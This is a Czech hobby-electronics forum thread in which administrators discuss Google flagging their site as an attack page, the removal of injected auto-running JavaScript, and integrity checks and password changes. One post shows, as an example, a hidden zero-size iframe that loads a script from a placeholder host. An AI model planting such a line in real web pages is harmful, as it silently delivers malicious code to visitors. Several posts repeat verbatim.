Hlášení EB - škodliva/útočná stránka?
Moderátor: Moderátoři
Vypadá to, že Google změnil stupeň důvěryhodnosti, takže vyžaduje snížit stupeň ochrany našich prohlížečů vypnutím blokování nahlášených útočných stránek.
Teď je otázka, jestli byla hrozba z Bastlírny skutečná (musel by tu být vložený odkaz na nebezpečné stránky), nebo jde o falešné hlášení.
Pravda, nestíhám kontrolovat všechna témata, natož všechny odkazy, ale i tak jich stíhám dost a na dvou počítačích neřval ani Avast Endpoint Protection Plus ani Norton (oba v plné a trvale aktualizované licenci).
Zkrátka víme o tom a pracuje se na tom.
Teď je otázka, jestli byla hrozba z Bastlírny skutečná (musel by tu být vložený odkaz na nebezpečné stránky), nebo jde o falešné hlášení.
Pravda, nestíhám kontrolovat všechna témata, natož všechny odkazy, ale i tak jich stíhám dost a na dvou počítačích neřval ani Avast Endpoint Protection Plus ani Norton (oba v plné a trvale aktualizované licenci).
Zkrátka víme o tom a pracuje se na tom.
- ZdenekHQ
- Administrátor
- Příspěvky: 25593
- Registrován: 21 črc 2006, 02:00
- Bydliště: skoro Brno
- Kontaktovat uživatele:
Protože odkaz na případný vir vede ze stránek EB, blokl paranoidní Google celou EB a spustil lavinu. Poslal jsem žádost o odstranění varování, s jejich rychlostí je to tak na týden.
Počet možných zjištěných útoků : 2
Jim je úplně jedno, koho a jak poškodí.
A další hlášení od Google : Googlebot found an extremely high number of URLs on your site. Co je jim do toho ?
Nejspíš je Google sám adept na BAN.![Confused :?](./images/smilies/icon_confused.gif)
V případě lidí, co mají přístup do databáze či administrace či ftp nás čeká změna hesel, už nad nějakým přemýšlejte.
Alovko, a ty prosím ulož logy přístupů, když něco takovýho objevíš.
Počet možných zjištěných útoků : 2
Jim je úplně jedno, koho a jak poškodí.
A další hlášení od Google : Googlebot found an extremely high number of URLs on your site. Co je jim do toho ?
Nejspíš je Google sám adept na BAN.
![Confused :?](./images/smilies/icon_confused.gif)
V případě lidí, co mají přístup do databáze či administrace či ftp nás čeká změna hesel, už nad nějakým přemýšlejte.
Alovko, a ty prosím ulož logy přístupů, když něco takovýho objevíš.
Naposledy upravil(a) ZdenekHQ dne 17 zář 2013, 15:57, celkem upraveno 1 x.
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Tak to bych udělal zálohu statických objektů, jejich kontrolní součty, ty pak periodicky kontroloval, a při neshodě nahradil modifikovaný soubory souborama ze zálohy, a přidaný soubory smazal. Tohle by měl umět třeba rsync. Změny by se pak měly provádět na stroji, kde je záloha.alovka píše:Minulý týden jsem odstraňoval škodlivý kód, který byl někým přidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nějaký javascript, který se automaticky spouštěl v prohlížeči při rozjetí stránky. Antiviry to běžně zachytili.
Pokud někdo pozmění statickej obsah fóra, pak, když se bude kontrola provádět každou půlhodinu, útočníkův projev bude mít životnost při obrovský dávce štěstí právě onu hodinu.
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
- ZdenekHQ
- Administrátor
- Příspěvky: 25593
- Registrován: 21 črc 2006, 02:00
- Bydliště: skoro Brno
- Kontaktovat uživatele:
Blbý je, že já jsem to už několikrát v minulých dnech kontroloval a vir veškerý žádný. Jestli byl i na EB a Alovka ho smázal, pak jsem to přehlédl, neboť už delší dobu řeším jednu stále více blbnoucí ženskou na hraně těžké závislosti na PC hrách versus jedno malé dítě, což je v podstatě každodenní problém, který se stále zhoršuje.
Google třeba hlásí příliš mnoho URL z adresy /ftp/, kam má přes robots.txt zakázaný chodit (a ví to) a naopak si stěžuje na neexistenci adresy http://www.ebastlirna.cz/forum/showthre ... readid=255 a žádá vyřešení, i když je to link starej jak existence EB samotná.
Google třeba hlásí příliš mnoho URL z adresy /ftp/, kam má přes robots.txt zakázaný chodit (a ví to) a naopak si stěžuje na neexistenci adresy http://www.ebastlirna.cz/forum/showthre ... readid=255 a žádá vyřešení, i když je to link starej jak existence EB samotná.
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Tam žádnej virus bejt nemusí, bylo by to moc okatý, stačí neškodnej JS, kterej si škodlivej kód stáhne odjinud. Nebo blbej iframe, okno do jinýho serveru. Vždyť co by měl vidět antivirák na tom, že kdesi v kódu fóra přibyl řádek viz dole?
<iframe src="http://www.server.tld/soubor.js" width="0" height="0"></iframe>
<iframe src="http://www.server.tld/soubor.js" width="0" height="0"></iframe>
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
- ZdenekHQ
- Administrátor
- Příspěvky: 25593
- Registrován: 21 črc 2006, 02:00
- Bydliště: skoro Brno
- Kontaktovat uživatele:
Pro mě je na EB virus jakýkoliv js kód, co neznám.
A příliš mnoho stránek je druhý problém, jen se to jaksi sešlo. Navíc si stěžoval getmefiles.net na přímé linky z EB, ty jsem deaktivoval.
Kdoví, jak se to všechno v Google poskládalo do sebe.
A příliš mnoho stránek je druhý problém, jen se to jaksi sešlo. Navíc si stěžoval getmefiles.net na přímé linky z EB, ty jsem deaktivoval.
Kdoví, jak se to všechno v Google poskládalo do sebe.
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?]